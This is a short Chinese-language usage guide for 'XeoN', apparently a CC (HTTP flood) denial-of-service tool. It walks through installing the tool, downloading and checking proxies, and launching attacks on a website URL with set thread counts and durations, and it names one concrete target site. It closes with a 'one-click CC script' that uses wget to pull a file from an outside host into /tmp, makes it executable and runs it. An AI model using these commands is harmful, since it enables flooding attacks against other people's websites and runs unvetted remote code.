你好,我是XeoN_K

教程:
     1.下载好脚本后终端或cmd里输入python3 install.py       (安装模块,不安装程序会报错)
     2.安装完成后请输入python3 XeoN.py -h                  (查看指令)
     3.使用前请先输入python3 XeoN.py -down                 (下载最新的代理)
     4.下载完成后输入python3 XeoN.py -check                (检查代理,如果不检查效果不会很大)

攻击指令:
     1.python3 XeoN.py -url 网址        (默认线程800个,攻击时间是60秒)
     2.python3 XeoN.py -url http://http://2.yz02.cn
  -t 200 -s 100    (这里设置线程为200个,攻击100秒)

工具大致就这样使用,你也可以参考脚本里的帮助内容.指令:python3 XeoN.py



一键CC脚本
cd /tmp

wget www.xiaojue.top/ddd

 chmod 777 cc

./cc